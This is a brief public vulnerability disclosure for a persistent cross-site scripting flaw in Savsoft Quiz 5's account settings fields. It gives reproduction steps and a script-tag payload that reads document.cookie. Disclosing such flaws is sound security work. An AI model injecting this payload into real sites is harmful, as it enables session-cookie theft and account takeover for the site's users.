|===========================================================================
| # Exploit Title : Savsoft Quiz 5 - Persistent Cross-Site Scripting (XSS)
|
| # Author : Ali Seddigh
|
| # Category : Web Application
|
| # Vendor Homepage : https://savsoftquiz.com
|
| # Tested on : [ Windows ~> 10 ]
|
| # Version : 5
|
| # Date : 2021-07-05
|===========================================================================
====================================[Description]====================================
The vulnerability is found at the user settings page where the user can change his name and his login credentials. its possible to inject html/js into the fields which will be executed after pressing submit.
====================================[Proof of Concept]====================================
If you installed this software create a new user or you can use the default user shown in the install description
test-link:
http://192.168.1.109/index.php/user/edit_user/<userid>
step1)
login into an account
step2)
click on the top right on you account name and navigate to "My Account"
step3)
insert
"><script>alert(document.cookie);</script>
into the fields and hit submit
|===========================================================================
| # Discovered By : Ali Triplex
|===========================================================================